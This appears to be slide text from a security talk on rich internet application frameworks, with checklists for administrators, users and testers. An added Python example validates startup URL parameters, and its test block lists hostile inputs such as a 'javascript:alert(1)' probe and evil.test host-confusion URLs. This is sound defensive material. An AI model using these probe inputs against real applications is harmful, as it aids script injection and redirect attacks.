RIA Framework Vendors: Attack Surfaces
- RIA frameworks are expanding the security attack surface: audio codecs, video codecs, IL parser / virtual machine, embedded HTML renderer, JavaScript engine, image libraries
- Users do not understand the danger
- Too many exploits will lead to backlash and mass uninstall

Security Checklist: Users and Administrators

Advice for Corporate Admins
- Disallow install of RIA frameworks without a legitimate business need
- For Windows, GPO can disable ActiveX controls per CLSID
- Once a framework is installed, IEAK becomes useless for enforcing policy on alternative installers
- Discourage development teams from using RIA unnecessarily
- Understand the local framework settings that you can set remotely
- Disable self-signed AIR install
- Block blobs at the border proxy if necessary

Advice for Normal People
- Don’t install frameworks you don’t need
- Use NoScript or equivalent to block JS/Flash/Silverlight instantiation except when you want it
- Read install boxes carefully
- Buy gold, guns, and canned food

Security Checklist: Penetration Testers
- Identify parameters used on instantiation
- Ensure SQL statements are parameterized
- Data stores are not subject to same-origin: ensure proper GUIDs are used
- Check for limits on storage mechanism invocations
- Identify mechanisms used for letting the app framework talk directly to page content
- Make people use SSL!
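The developer checklist’s “beware of passed-in arguments, don’t use them to fetch URLs” and “lock your app to your domain” items, and the tester’s “identify parameters used on instantiation”, come down to one check: anything the calling site hands the app at startup must be validated before it selects a fetch target. The following is an added example, not code from the slides or from any framework; the allowlisted host app.example.com, the parameter name `target` and the default start page are assumptions for the demo.

```python
"""Validating a URL passed into a RIA at instantiation time.

Added example, not from the slides. app.example.com, the 'target' parameter
and the default start page are assumed names for the demo.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"app.example.com"}   # assumed: the app's own domain only
ALLOWED_SCHEMES = {"https"}           # "Make people use SSL!"
DEFAULT_START_PAGE = "https://app.example.com/start"   # assumed


def is_safe_fetch_target(raw) -> bool:
    """Return True only for an https URL whose host is on the allowlist.

    Rejects the usual tricks in a passed-in URL argument:
      * javascript:/data:/vbscript: schemes (script execution, not a fetch)
      * scheme-relative '//host/...' values (scheme inherited from context)
      * userinfo confusion such as https://evil.test@app.example.com
      * suffix/prefix look-alikes such as app.example.com.evil.test
      * backslash and whitespace games that parsers disagree on
      * non-default ports and out-of-range ports
    """
    if not isinstance(raw, str) or len(raw) > 2048:
        return False
    raw = raw.strip()
    if "\\" in raw or any(c.isspace() for c in raw):
        return False
    try:
        parts = urlsplit(raw)
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            return False
        if parts.username is not None or parts.password is not None:
            return False
        host = parts.hostname          # lower-cased, port and brackets removed
        if host is None or host not in ALLOWED_HOSTS:
            return False
        if parts.port not in (None, 443):   # .port raises on out-of-range
            return False
    except ValueError:
        return False
    return True


def resolve_start_page(params: dict) -> str:
    """Pick the page the RIA will load from its instantiation parameters.

    Any rejected value falls back to a fixed default; the caller's input is
    never echoed into script or used as a fetch URL unless it passed the check.
    """
    candidate = params.get("target", "")
    return candidate if is_safe_fetch_target(candidate) else DEFAULT_START_PAGE


if __name__ == "__main__":
    # Constructed sample inputs a calling page might pass in.
    for sample in ["https://app.example.com/profile?id=1",
                   "javascript:alert(1)",
                   "//app.example.com/x",
                   "https://evil.test@app.example.com/",
                   "https://app.example.com.evil.test/"]:
        print(f"{sample!r:45} -> {is_safe_fetch_target(sample)}")
```

The allowlist is an exact-match set rather than a substring or regex test, and the scheme check runs before anything else, so a `javascript:` value never reaches the point where it could be handed to the embedded renderer. A tester working the “identify parameters used on instantiation” item would feed exactly the inputs in the `__main__` block to each parameter and watch which ones the app echoes or loads.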


Summary
- RIA frameworks widely differ in their security models
- It is highly likely that web developers will introduce interesting flaws into their desktop applications
- The Web is becoming less standardized, more complex, and much more dangerous

To Be Done
- Automated auditing tools for these frameworks are necessary
- Detailed per-framework checklists need to be created
- Plenty of bugs to find for everyone

Q&A
Thanks for coming! Questions?
https://www.isecpartners.com


Appendix: For Further Reading
[1] Lutz Roeder. Reflector for .NET. http://www.aisto.com/roeder/dotnet/
[2] Kevin Kelly, Gary Wolf. Kiss your browser goodbye: The radical future of media beyond the Web. Wired 5.03, March 1997.
[3] Ian Hickson, David Hyatt. A vocabulary and associated APIs for HTML and XHTML (HTML 5 draft). http://www.w3.org/html/wg/html5/ , July 1 2008.
[4] The Mozilla Corporation. Interaction between privileged and non-privileged pages. http://developer.mozilla.org/en/docs/Code_snippets:Interaction_between_privileged_and_non-privileged_pages
[5] Adobe Security Team. Adobe AIR 1.0 Security White Paper. http://download.macromedia.com/pub/air/documentation/1/air_security.pdf
